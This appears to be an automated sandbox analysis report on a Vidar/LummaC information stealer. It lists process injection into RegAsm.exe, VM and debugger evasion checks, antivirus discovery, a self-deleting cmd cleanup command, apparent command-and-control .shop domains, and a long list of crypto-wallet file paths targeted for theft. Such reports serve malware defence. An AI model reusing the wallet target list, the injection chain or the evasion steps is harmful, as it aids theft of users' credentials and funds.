Source: C:\ProgramData\KJKJJJECFI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: RegAsm.exe, 00000009.00000002.2376623871.0000000001025000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW("
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_0043C800 LdrInitializeThunk,

9_2_0043C800

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0041AD5F

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0041616A

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415E38 mov eax, dword ptr fs:[00000030h]

2_2_00415E38

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040B042 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,memset,

2_2_0040B042

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C8F8 SetUnhandledExceptionFilter,	2_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C0FB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C0FB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C2AAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02C12481 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_02C12481

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: awwardwiqi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0040FE05

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C0008	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD1008	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1194008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_6C2F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

2_2_6C2F4760

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00401000 cpuid

2_2_00401000

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

2_2_0040E910

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Queries volume information: C:\ProgramData\KKJEBAAECB.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Queries volume information: C:\ProgramData\KJKJJJECFI.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E863 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

2_2_0040E863

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E7F6 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_0040E7F6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E8BD GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_0040E8BD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
